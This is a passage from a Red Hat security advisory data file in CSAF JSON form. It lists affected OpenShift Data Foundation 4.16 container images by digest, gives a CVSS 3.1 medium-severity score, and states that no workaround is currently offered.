"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
